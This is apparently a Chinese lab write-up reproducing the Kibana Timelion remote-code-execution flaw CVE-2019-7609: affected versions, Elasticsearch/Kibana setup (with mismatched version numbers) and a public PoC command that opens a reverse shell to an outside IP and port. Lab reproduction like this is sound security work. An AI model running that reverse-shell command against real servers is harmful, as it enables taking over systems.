Kibana远程代码执行漏洞(CVE-2019-7609)复现
程序员文章站
2022-07-15 11:22:48
...
简介
攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。
影响版本
Kibana < 6.6.1
Kibana < 5.6.15
环境搭建
首先去官网下载6.5.3的tar包并解压
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz
然后运行
cd elasticsearch-6.5.3
./bin/elasticsearch
不要用root用户运行
访问http://127.0.0.1:9200/
证明成功了
Kibana安装
官网下载压缩包并解压
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar –zxvf kibana-5.4.3-linux-x86_64.tar.gz
直接运行
cd kibana-5.4.3-linux-x86_64
./bin/kibana
访问http://127.0.0.1:5601/搭建成功
我们这里搭建的版本是6.5.3
漏洞复现
Poc地址
https://github.com/LandGrey/CVE-2019-7609
python 1.py -u 127.0.0.1:5601 -host 192.168.220.137 -port 6666 --shell
运行命令进行反弹shell
反弹成功